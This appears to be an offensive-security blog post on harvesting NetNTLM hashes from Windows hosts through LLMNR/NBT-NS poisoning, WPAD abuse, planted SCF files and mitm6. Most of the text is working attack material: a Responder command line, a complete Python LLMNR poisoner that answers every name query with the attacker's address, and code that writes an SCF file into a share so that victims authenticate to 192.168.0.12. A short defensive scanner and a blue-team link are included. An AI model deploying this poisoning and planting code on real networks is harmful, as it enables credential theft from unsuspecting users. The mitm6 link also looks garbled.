There are a few known ways to get Windows hosts to hand you their credentials (NetNTLM challenge/responses) on a local network.
The easiest, first method is to listen for LLMNR broadcasts. When a Windows host cannot resolve a name through DNS it falls back to LLMNR (and NBT-NS) and asks the whole local segment. Using Responder, our device answers those requests with its own address, so the victim connects to us and sends its credentials to us as we are acting as MITM (Man in the Middle).
The same goes for the second method, WPAD abuse. When a browser starts it looks for a WPAD DNS entry (the proxy auto-configuration host). If that name does not exist in DNS the lookup falls back to LLMNR/NBT-NS, our device answers it and acts as the MITM proxy, and Responder can then demand authentication before serving the proxy configuration.
Both attacks can be performed with Responder: https://github.com/SpiderLabs/Responder
( responder -I eth1 -v -f -F -P -d -r )
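As an added example (not part of the original post and not code from the Responder project), here is what the first method does on the wire: the script parses an LLMNR query exactly as a Windows host emits it when DNS fails, and builds the poisoned A-record answer that points the victim at the attacker. The attacker IP 192.168.0.12, the queried name "fileshare" and the packet bytes are constructed here for illustration; the listener at the bottom joins the LLMNR multicast group and answers every A query, which is Responder's default behaviour.

```python
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # LLMNR multicast group (RFC 4795)
LLMNR_PORT = 5355
QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """Encode a hostname as DNS-style length-prefixed labels."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split("."))
    return out + b"\x00"


def build_query(name: str, txid: int = 0x1234) -> bytes:
    """Constructed sample input: the query a Windows host sends when DNS
    cannot resolve `name` (header, one question, type A, class IN)."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def parse_query(data: bytes):
    """Return (txid, name, qtype, qclass, raw_question) for an LLMNR query."""
    if len(data) < 12:
        raise ValueError("packet shorter than LLMNR header")
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    if flags & 0x8000:
        raise ValueError("QR bit set: this is a response, not a query")
    if qdcount != 1:
        raise ValueError("LLMNR queries carry exactly one question")
    labels, off = [], 12
    while True:
        length = data[off]
        off += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("name compression is not allowed in a query")
        labels.append(data[off:off + length].decode("ascii"))
        off += length
    qtype, qclass = struct.unpack("!HH", data[off:off + 4])
    off += 4
    return txid, ".".join(labels), qtype, qclass, data[12:off]


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """Answer an A query with the attacker's address, whatever name was asked for."""
    txid, _name, qtype, qclass, question = parse_query(query)
    if (qtype, qclass) != (QTYPE_A, QCLASS_IN):
        raise ValueError("only A/IN questions are poisoned in this example")
    # Same transaction ID, QR=1, the question echoed back, one answer record.
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    qname = question[:-4]                      # drop QTYPE/QCLASS, keep the name
    rr = qname + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4) + socket.inet_aton(attacker_ip)
    return header + question + rr


def poison_forever(attacker_ip: str, iface_ip: str = "0.0.0.0") -> None:
    """Join the LLMNR group and answer every A query with attacker_ip.
    Replies are sent unicast to the querier, as the RFC requires."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", LLMNR_PORT))
    mreq = socket.inet_aton(LLMNR_GROUP) + socket.inet_aton(iface_ip)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    while True:
        data, src = sock.recvfrom(1500)
        try:
            reply = build_poisoned_response(data, attacker_ip)
        except ValueError:
            continue                           # not an A query: stay silent
        sock.sendto(reply, src)
        print(f"poisoned {parse_query(data)[1]!r} from {src[0]} -> {attacker_ip}")


if __name__ == "__main__":
    poison_forever("192.168.0.12")             # attacker IP is an assumption
```

The victim then connects to 192.168.0.12 for whatever service it wanted (SMB, HTTP, ...) and that is where Responder's listeners demand authentication and log the NetNTLM hash; this script only shows the name-resolution half.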
Blue teams: read this article to stop these simple default Windows settings from being abused: /defend-against-responder/
The third method requires write access to a share that users browse. Create an SCF file with the following content:

[Shell]
Command=2
IconFile=\\192.168.0.12\share\test.ico
[Taskbar]
Command=ToggleDesktop

Then run Responder on your device. When a user opens the folder in Explorer, the client tries to fetch the file's icon by connecting to your share; Responder asks it to authenticate and collects the hashes.

The fourth method uses mitm6, if the default Windows settings have not been changed. Same principle as WPAD but over IPv6: Windows prefers IPv6 and asks for a DHCPv6 lease by default, mitm6 answers and sets itself as the DNS server, then resolves the WPAD name to the attacker. https://github.com/fox-it/mitm61
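The SCF method (the third method above), as an added example that is not part of the original post: build_scf produces the file with exactly the content shown, with CRLF line endings, plant_scf drops it into a directory you can write to, and remote_icon_target and audit_share are the defensive counterpart, a scan of a share for SCF files whose IconFile points at a UNC path, which is how a blue team would spot a planted file. The attacker IP 192.168.0.12 and the share and icon names are the post's; the filename "@readme.scf" and the local shell32.dll sample are assumptions.

```python
import re
from pathlib import Path

# The file body from the post, with CRLF line endings as Windows expects.
SCF_TEMPLATE = (
    "[Shell]\r\n"
    "Command=2\r\n"
    "IconFile={icon}\r\n"
    "[Taskbar]\r\n"
    "Command=ToggleDesktop\r\n"
)


def build_scf(attacker_host: str, share: str = "share", icon: str = "test.ico") -> str:
    """Return SCF content whose icon lives on the attacker's share (\\\\host\\share\\icon)."""
    unc = "\\\\" + attacker_host + "\\" + share + "\\" + icon
    return SCF_TEMPLATE.format(icon=unc)


def plant_scf(target_dir, attacker_host: str, filename: str = "@readme.scf") -> Path:
    """Write the SCF file into a writable share directory.
    The '@' prefix is an assumption: it makes the file sort first in Explorer."""
    path = Path(target_dir) / filename
    path.write_bytes(build_scf(attacker_host).encode("ascii"))   # bytes: keep the CRLFs
    return path


# IconFile=\\host\share\file  ->  capture the whole UNC path
_ICON_RE = re.compile(r"^\s*IconFile\s*=\s*(\\\\[^\\\r\n]+\\[^\r\n]*)",
                      re.IGNORECASE | re.MULTILINE)


def remote_icon_target(scf_text: str):
    """Return the host an SCF file pulls its icon from, or None if the icon is
    local (e.g. a path into shell32.dll). Defensive check for planted files."""
    m = _ICON_RE.search(scf_text)
    if not m:
        return None
    return m.group(1).split("\\")[2]          # ['', '', host, share, file]


def audit_share(root):
    """Walk a share and list (path, host) for every SCF whose icon is remote."""
    hits = []
    for scf in Path(root).rglob("*.scf"):
        host = remote_icon_target(scf.read_text(errors="replace"))
        if host is not None:
            hits.append((scf, host))
    return hits


if __name__ == "__main__":
    print(build_scf("192.168.0.12"))
    print(remote_icon_target(build_scf("192.168.0.12")))   # 192.168.0.12
```

On the attacking side, plant the file and start Responder as in the command above; on the defending side, run audit_share against the root of each writable share and alert on any host that is not one of your own servers.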